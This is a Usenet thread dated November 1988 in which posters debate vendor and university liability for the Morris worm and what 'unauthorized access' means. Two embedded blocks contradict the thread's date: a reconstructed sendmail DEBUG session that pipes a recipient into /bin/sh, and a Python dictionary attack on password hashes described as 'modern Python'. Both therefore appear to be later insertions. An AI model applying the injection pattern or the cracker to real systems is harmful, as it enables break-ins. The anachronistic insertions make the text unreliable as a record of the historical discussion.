[comp.protocols.tcp-ip] Worms and fixing blame

lars@ACC-SB-UNIX.ARPA (Lars J Poulsen) (11/10/88)

> In article <2060@spdcc.COM>, eli@spdcc.COM (Steve Elias) writes:
>> "Wormer" Morris has quite a career ahead of him, i'll bet.
>> he has done us all a favor by benevolently bashing bsd 'security'.

> Date: 7 Nov 88 20:06:23 GMT
> From: ember!dre@sun.com  (David Emberson)
> Subject: Re: a holiday gift from Robert "wormer" Morris
> 
> I knew about this sendmail bug at least four years ago, courtesy of Matt
> Bishop (now at Dartmouth).  He wrote a paper detailing at least a half dozen
> holes in the Unix system and methods for constructing trojan horses which was
> so dangerous that he responsibly decided not to publish it, but instead to
> give selected copies to people who could fix some of the problems.
> ...  His behaviour, while unsung by the press and the Usenet community,
> is an example of the highest in professional and academic standards. 
> This is the kind of behaviour that we should be extolling.

I work as a customer service manager at a TCP-IP networking company.
My wife is a corporate MIS person. She asked me about technical aspects of
the worm, and expressed a wish to see severe criminal charges pressed against
the perpetrator. I asked her on what grounds, since there apparently was no
provable malicious intent and no "real damage". Rather, I suggested, SUN
Microsystems might be liable for releasing operating systems software with
undocumented functionality creating a security hole, and companies and/or
government institutions that had chosen to run poorly documented software
available "for free" from a research facility should accept responsibility
for whatever befalls them if they do not review the software that they make
themselves dependent on.

I suggested as a parallel that no company would be likely to install, without
test and review, a payroll package found floating around on a computer bulletin
board, and if they did, and the IRS sued them for improper calculation of
withholdings, they would have only themselves to blame. I think she agreed.

The DEBUG code apparently was intended for use internally in the sendmail
development group, and should have been turned off at product release.
It is sort of understandable that a university would not have a clear idea
about quality control, and would not have an independent review before release.
It is much less acceptable that the same seems to have been the case
at SUN. As far as I can ascertain, the ULTRIX engineering group was aware of
the problem, and the Ultrix systems that I have looked at all seem to
contain a sendmail compiled without DEBUG.

If the claim mentioned above (that UCB's CSRG (sp?) was explicitly made
aware of this problem several years ago) is true, it seems to me that a
claim could be made that UCB was negligent in not instituting procedures
to address this problem. David Emberson lauds Mr Bishop for being a
responsible person who brought the problem to the attention of the people
who were in a position to correct it, rather than creating a media event;
but look how effective that was ????

As a minimum, everybody who buys system software should add the following
clause to their purchase orders: "The system shall identify each user by
a unique user identification, and password validation shall be used to
ensure that no unauthorized access occurs". This will ensure that you can
hold the vendor liable for losses you might incur in a situation like this.

UCB, of course, would likely refuse to accept this responsibility, thus
making the problem with non-commercial software explicit.

/ Lars Poulsen
  Advanced Computer Communications
 (Employer name for identification only; my employer knows I have opinions
  but disclaims responsibility)

bzs@pinocchio.UUCP (Barry Shein) (11/18/88)

From: lars@ACC-SB-UNIX.ARPA (Lars J Poulsen)
>As a minimum, everybody who buys system software should add the following
>clause to their purchase orders: "The system shall identify each user by
>a unique user identification, and password validation shall be used to
>ensure that no unauthorized access occurs". This will ensure that you can
>hold the vendor liable for losses you might incur in a situation like this.

Does this make sense? Does sending mail without a password constitute
"unauthorized access"? How about being able to transfer a file to a
publicly writeable scratch area? How about if it fills that scratch
area and cripples the system, or fills a mail spool causing mail to be
lost? How about being able to finger someone? What if someone merely
ties up networking bandwidth so as to cause you major nuisance? What if
they merely dial-up your system with N modems and tie up every
available dial-up you have? Are all those the vendor's fault? What if
they eavesdrop on your packets going across an ethernet? etc etc.

What exactly is "unauthorized access"? Whatever inconveniences you as
an afterthought?

I don't believe that this past problem would have been an issue under
your proposal; the system certainly demands a password for login
access. You're too vague: the bug exploited was that a particular mail
message's text could allow an "undesired" program to run (as opposed to
the many, permitted and necessary, "desired" programs regularly run on
behalf of mail messages.)
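To be concrete, the hole worked roughly like this: with sendmail's DEBUG
command enabled, the SMTP dialogue could name a command pipeline as a
recipient, and the message body then became input to the shell. An
illustrative session (reconstructed from published accounts such as
Spafford's analysis -- the host name and exact reply texts below are my
guesses, not a verbatim log):

```
220 victim Sendmail ready
debug
200 Debug set
mail from: </dev/null>
250 ok
rcpt to: <"| sed -e '1,/^$/d' | /bin/sh ; exit 0">
250 ok
data
354 Enter mail
... shell commands to fetch and start the worm ...
.
250 ok
quit
```

Note that no password is asked for at any point; the "recipient" pipe is
the whole trick.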

The problem is that users' security needs are widely varied. Oh, I
agree that this past worm entry was an obvious botch, but let's talk
in more general terms: at some point we all agree an error occurred,
but the important thing is to agree on intent.

It's easy to say something like "reasonable security" in a contract or
some other such mom and apple pie truism, but what does it mean?  How
can we determine if the contract has been breached?

What are needed are reasonably detailed security requirements (the
military certainly has these, although I doubt they would correspond to
most users' needs.) A test suite reflecting those requirements would
also be very helpful.

But that would require real work, and cost real money...

Let's face it, one person's security requirement is another's damned
nuisance.

	-Barry Shein, ||Encore||

johnm@vaxc.cc.monash.edu.au (John Mann) (11/22/88)

In article <8811100539.AA27545@ACC-SB-UNIX.ARPA>, lars@ACC-SB-UNIX.ARPA 
(Lars J Poulsen) writes:
> As a minimum, everybody who buys system software should add the following
> clause to their purchase orders: "The system shall identify each user by
> a unique user identification, and password validation shall be used to
> ensure that no unauthorized access occurs". This will ensure that you can
> hold the vendor liable for losses you might incur in a situation like this.

Does this mean that everyone who wants to send mail to your machine has
to have their own usercode and password on that machine?

I guess this also means that the vendor has to disable the ".rhosts" facility
to prevent users from being able to open up their own security.
Are you going to disable other TCP/IP services like finger?  ARP?

I am not trying to put you down, just raise the question of what you really
mean by "authorized" and "access".  Does running a TCP/IP server of any
type automatically "authorize" everyone to "access" your system?  Does putting
your machine on an Ethernet/modem connection "authorize" other people to send
packets to it/dial your phone number?

I presume someone will say that by "access", it really means people 
"Logging on" where they shouldn't.  But the worm didn't involve a person 
"Logging on" where they shouldn't.  

Didn't the worm invoke Telnet where it had guessed the password?  If it had
a valid username and password, it is by definition "authorized", isn't it?
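(Published analyses say the worm actually used rexec and rsh rather than
Telnet, but the password-guessing step is the same idea: take the one-way
hashes readable in /etc/passwd and try the login name, simple permutations
of it, and a built-in word list, all offline.  A rough sketch -- modern
Python pseudocode, obviously not the worm's C, with SHA-256 standing in
for the old DES crypt() and entirely made-up account data:)

```python
# Illustrative sketch of offline dictionary guessing against hashed
# passwords, in the style of the 1988 worm.  SHA-256 stands in for the
# DES-based crypt() of the era; usernames and passwords are invented.
import hashlib

def hash_pw(pw: str) -> str:
    # One-way hash, as stored in the password file.
    return hashlib.sha256(pw.encode()).hexdigest()

# A captured password file: username -> one-way hash (hypothetical data).
shadow = {
    "lars": hash_pw("acc1988"),
    "barry": hash_pw("encore"),
}

def guesses(user: str):
    # Mirror the worm's strategy: the login name, simple permutations
    # of it, then a small internal word list.
    yield user
    yield user + user
    yield user[::-1]
    for word in ("password", "wizard", "encore", "acc1988"):
        yield word

def crack(shadow):
    # Hash each candidate and compare against the stored hash; no login
    # attempt is needed until a match is found.
    found = {}
    for user, h in shadow.items():
        for g in guesses(user):
            if hash_pw(g) == h:
                found[user] = g
                break
    return found
```

Run against the made-up data above, crack() recovers both passwords --
which is exactly why such a simple strategy worked so well in 1988.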

> UCB, of course would likely refuse to accept this responsibility, thus
> making the problem with non-commercial software explicit.

I guess they could say that straight off the tape the networking doesn't work
(not configured etc.), and you don't *have* to turn the networking on. :-)

	John
--
John Mann, Systems Programmer, Computer Centre, Monash Uni. VIC 3168, Australia
Internet: JohnM@Vaxc.CC.Monash.Edu.Au   Phone: +61 3 565 4774